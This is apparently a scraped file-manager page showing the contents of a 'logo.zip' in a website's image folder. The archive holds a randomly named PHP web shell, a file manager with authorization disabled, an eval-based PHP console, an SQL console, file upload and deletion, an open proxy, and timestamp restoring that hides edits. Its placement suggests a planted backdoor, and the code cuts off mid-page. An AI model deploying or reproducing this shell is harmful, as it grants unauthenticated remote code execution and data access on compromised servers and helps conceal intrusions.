File manager - Edit - /home/u982231449/domains/huntora.site/public_html/static/img/logo/logo.zip
Back
PK R��Z%M��. �. 868521713hc.phpnu �[��� <?pHp /* XMAN PHP ver 1.4*/ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url(""); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url(""); } .file { background-image: url(""); } <?=fm_home_style()?> .img { background-image: url(""); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" 